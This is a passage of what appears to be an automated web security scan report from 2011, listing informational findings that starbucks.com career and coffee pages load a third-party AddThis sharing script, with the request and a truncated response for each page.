Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:19:02 GMT
Connection: close
Content-Length: 42603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.15. http://www.starbucks.com/career-center/career-diversity

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/career-diversity

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /career-center/career-diversity HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:19:17 GMT
Connection: close
Content-Length: 38452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.16. http://www.starbucks.com/career-center/career-diversity/partner-networks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/career-diversity/partner-networks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /career-center/career-diversity/partner-networks HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:19:22 GMT
Connection: close
Content-Length: 40582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.17. http://www.starbucks.com/career-center/international-positions

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/international-positions

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /career-center/international-positions HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:19:26 GMT
Connection: close
Content-Length: 36558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.18. http://www.starbucks.com/career-center/working-at-starbucks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/working-at-starbucks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /career-center/working-at-starbucks HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:19:09 GMT
Connection: close
Content-Length: 43598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.19. http://www.starbucks.com/coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:05:07 GMT
Connection: close
Content-Length: 55844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.20. http://www.starbucks.com/coffee/learn

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/learn HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:34 GMT
Connection: close
Content-Length: 37490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.21. http://www.starbucks.com/coffee/learn/clover

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/clover

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/learn/clover HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:51 GMT
Connection: close
Content-Length: 38935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.22. http://www.starbucks.com/coffee/learn/flavors-in-your-cup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/flavors-in-your-cup

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/learn/flavors-in-your-cup HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:46 GMT
Connection: close
Content-Length: 43755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.23. http://www.starbucks.com/coffee/starbucks-natural-fusions

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-natural-fusions HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:12:33 GMT
Connection: close
Content-Length: 50482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.24. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/caramel

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-natural-fusions/caramel HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:55 GMT
Connection: close
Content-Length: 41222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.25. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/cinnamon

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-natural-fusions/cinnamon HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:09 GMT
Connection: close
Content-Length: 41265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.26. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/savoring

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-natural-fusions/savoring HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:28 GMT
Connection: close
Content-Length: 40000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.27. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/vanilla

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-natural-fusions/vanilla HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:36 GMT
Connection: close
Content-Length: 41191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.28. http://www.starbucks.com/coffee/starbucks-reserve-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-reserve-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:11:42 GMT
Connection: close
Content-Length: 56757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.29. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:12:17 GMT
Connection: close
Content-Length: 42135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.30. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:12:32 GMT
Connection: close
Content-Length: 40792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.31. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/organic-blue-java

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-reserve-coffee/organic-blue-java HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:11:58 GMT
Connection: close
Content-Length: 40831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.32. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:12:09 GMT
Connection: close
Content-Length: 40633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.33. http://www.starbucks.com/coffee/via

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/via HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:11:08 GMT
Connection: close
Content-Length: 50149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

